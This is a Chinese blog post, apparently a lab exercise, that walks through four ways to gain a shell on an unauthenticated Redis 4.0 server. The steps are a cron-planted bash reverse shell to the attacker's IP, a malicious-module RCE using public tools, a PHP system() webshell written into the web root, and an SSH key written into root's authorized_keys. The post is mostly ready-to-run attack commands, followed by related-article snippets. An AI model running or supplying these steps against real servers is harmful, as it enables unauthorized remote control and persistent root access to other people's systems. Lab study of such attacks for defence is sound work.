【redis漏洞复现】Redis getshell的几种方式

已于 2022-03-07 09:35:24 修改
阅读量1.1w 收藏 19
点赞数 7
分类专栏: 杂项 文章标签: redis linux 信息安全
于 2022-03-01 15:13:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59924300/article/details/123206164
版权

简介:

Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。作为一个高性能的key-value数据库,Redis在部分场景下对关系数据库起到很好的补充作用。

环境搭建:

系统:centos7(192.168.111.132)

攻击机:kali(192.168.111.130)

安装redis4.0

1.输入

wget http://download.redis.io/releases/redis-4.0.9.tar.gz

2.解压编译
tar -zxvf redis-4.0.9.tar.gz
cd redis-4.0.9
make
make test
make install

3.修改redis.conf的配置文件添加bind:0.0.0.0

vim redis.conf

4. 启动redis
redis-server /root/redis-4.0.9/redis.conf

getshell(一)

在kali上输入

Redis-cli -h 192.168.111.132//连接目标redis

set  xx   "\n* * * * * bash -i >& /dev/tcp/192.168.111.130/8888 0>&1\n"

config set dir /var/spool/cron/

config set dbfilename root

save

之后监听8888端口,等一会就是收到一个shell

getshell(二)

输入

git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
git clone https://github.com/Ridter/redis-rce.git

进入RedisModules-ExecuteCommand目录输入

make

会生成moudle.so 文件

之后输入

cp /home/kali/桌面/RedisModules-ExecuteCommand/module.so /home/kali/桌面/redis-rce

把生成的moudle.so复制到redis-rce目录里面,之后进入redis-rce目录里面输入

python redis-rce.py -r 192.168.111.132 -p 6379 -L 192.168.111.130 -f moudle.so

getshell(三)

上传webshell

redis-cli -h 192.168.111.132----------------------------->连接目标
CONFIG SET dir /www/wwwroot/----------------------------->设置备份路径
CONGIG SET dbfilename x.php ------------------------------>设置备份文件
SET x "<?php system($_GET['cmd']);?>"--------------------->往备份文件里面写入一句话
BGSAVE ---------------------------------->进行保存

之后可以在目标机器中的/www/wwwroot/目录中找到x.php文件

里面的内容:

getshell(四)

前提
a.Redis服务使用ROOT账号启动
b.服务器开放了SSH服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器

首先生成密钥输入

ssh-keygen -t rsa

之后进入/root/.ssh目录把公钥输入到1.txt中

(echo -e "\n";cat id_rsa.pub;echo -e "\n")>1.txt ----------------------->\n是回车

然后输入

cat 1.txt |redis-cli -h 192.168.111.130 -x set crack---------------------->该命令是把一个

key为crack,值为cat 1.txt 添加到redis中

紧接着进入redis中输入

config set dir /root/.ssh
config set dbfilename authorized_keys
save

最后输入使用ssh登陆

 (Ps:redis 查看key keys *:

              查看值 get key

              清空所有值flushall

FlynnAAAA
关注
专栏目录
redis 在渗透中 getshell 方法总结
chenglanqi6606的博客
05-07 2642
0x00 前言 今天同学突然提到了redis,想到最近搞站确实有一段时间没有遇到redis getshell的场景了(主要是最近懒,搞得少),有些利用方式都忘的差不多,这里再对常见的redis getshell方式总结并复现一遍,避免遗忘。如果有同学恰好看到了这篇文章,并能解决自己的问题,...
Redis未授权漏洞复现及利用(window,linux
热门推荐
dreamthe的博客
03-22 2万+
1.了解redis Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivota赞助。 2.redis漏洞原理 Redis默认情况下是绑定在0.0.0.0:6379端口的,如果没有设置密码(一般密码为空)或者密码为弱密码的情况下并且也没有
redis未授权getshell四种方式
没有
04-24 5100
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上,然后在从机上加载so文件,我们就可以执行拓展的新命令了。
13,Redis备份写入Shell以及公钥
最新发布
m0_64040060的博客
09-24 404
1. redis服务绑定在0.0.0.0:6379端口,而且信任了其他IP,导致了Redis服务暴露在公网上。3.如果Redis服务以root身份运行,可以给root用户写入SSH公钥文件,直接通过SSH登陆服务器。浏览器访问: http://127.0.0.1/demo.php?输入save保存即可在访问在/var/www/html下的demo.php。启动Redis服务: # ./redis-server。a、redis 服务以 root 账户运行。连接Redis服务: # ./redis-cli。
redis getshell方法
00勇士王子的博客
03-07 1792
redis getshell方法总结
记一下redis的报错,顺便利用redis获取下shell
weixin_54227009的博客
06-06 332
之所以会报这个错的原因是因为防火墙没关,所以把目标机器的防火墙关了就ok了1:查看防火状态systemctl status firewalldservice iptables status2:暂时关闭防火墙systemctl stop firewalldservice iptables stop3:永久关闭防火墙systemctl disable firewalldchkconfig iptables off4:重启防火墙systemctl enable firewalldservice iptable
redis未授权访问漏洞那拿SHELL
weixin_30737363的博客
12-06 319
一、什么是redis未授权访问漏洞: 1、redis是一种文档型数据库,快速高效,存储在内存中,定期才会写磁盘。主要用于快速缓存,数据转存处理等。默认redis开在6379端口,可以直接访问。并不需要任何认证信息,由此带来了巨大的安全隐患。 2、如何验证redis未授权访问是否开启: 1 #使用kali或者任何linux系统安装redis-cli 2 redis-cli -h targ...
第02篇:Redis主从复制getshell1
08-03
1、生成恶意.so文件,下载RedisModules-ExecuteCommand使用make编译即可生成 1、监听本地1234端口 2、将Redis服务器设置
SSRF——weblogic vulhub 漏洞复现及内网redis反弹shell
weixin_43774222的博客
03-17 6601
一、概述 SSRF( Server-side Request Forgery )服务端请求伪造。 很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。 主要攻击手段 1.可以对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息; 2.攻击运行在内网或本地的应用程序(比如溢出); 3.对内网web应用进行指纹识别,通过访问默认文件实现
Redis未授权访问漏洞复现
xunhuanmao的博客
09-22 2399
Redis未授权访问漏洞的环境搭建以及利用方式
Redis-Getshell:Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell
05-05
Redis-Getshell 其中的p参数为了区别端口P我将其改成了a Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell Usage:python3 RedisGetshell.py -H 127.0.0.1 -P 6379 还可以更完善的,后面有时间了就修改哈! Webshell SSH crontab
redis未授权getshell整合利用
qq_40898302的博客
06-13 1470
redis未授权getshell四种方式
redis服务连接及常规操作和redis服务getshell
whale_waves的博客
05-13 880
Redis,英文全称是(远程字典服务),是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。redis服务于传统服务器不同,redis是内存数据库,Redis的数据是存在内存中的。它的读写速度非常快,每秒可以处理超过10万次读写操作,因此redis被。
redis未授权到getshell
weixin_68408599的博客
06-12 1217
写入webshell虽然简单便捷,但是很多网站都严格限制了写入规则,但是可以通过定时任务,写入公钥等来获取webshell并建立持久性控制。自己使用需要小心,redis未授权是比较常见的漏洞了,常常被用于执行挖矿病毒,甚至是勒索病毒。
初步认识redisredis获取webshell方法
weixin_44377940的博客
04-08 538
什么是redis 一个免费、开源的Key-Value数据库。(MySQL是关系型数据库) redis和mysql的区别 mysql可以通过where等sql语句来查询想要的数据,而redis并不关系存储的数据类型,只能通过key来寻找value,也就是说Key-Value需要通过遍历所有的key才能找到想要的value。 mysql的存储更加倾向于作为一个表,而redis则是键值对。 放一张其...
redis 未授权访问拿shell
blackguest07的博客
03-18 1032
redis未授权访问拿shell
redis渗透中的getshell问题总结
收集盒 Book box
10-20 1168
0x00 前言 redis现在很多都是直接对外开放端口,从外网无需任何验证即可直接访问到。相关的例子可以从shodan或者zoomeye上找到。那么问题来了,作为一个内存数据库,redis上肯定也有很多敏感信息,比如redis用于做session的存储,可能导致敏感信息泄露。不过最近研究redis从乌云社区和drops上看到有人getshell,思路比较有趣,特地写一下总结。 0x
Redis_getshell简单复现
qq_52764444的博客
09-22 371
Redis_getshell复现 利用Redis写webshell Redis基于主从复制的RCE Redis未授权访问漏洞
redis未授权访问getshell
03-16
Redis未授权访问是指Redis服务器的访问控制没有设置好,导致攻击者可以通过Redis的一些命令获取服务器的敏感信息或者执行恶意代码,从而实现getshell的攻击。为了避免这种情况发生,我们需要对Redis服务器进行安全配置,包括设置密码、限制访问IP等措施。同时,也需要及时更新Redis的版本,以防止已知漏洞被攻击利用。
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值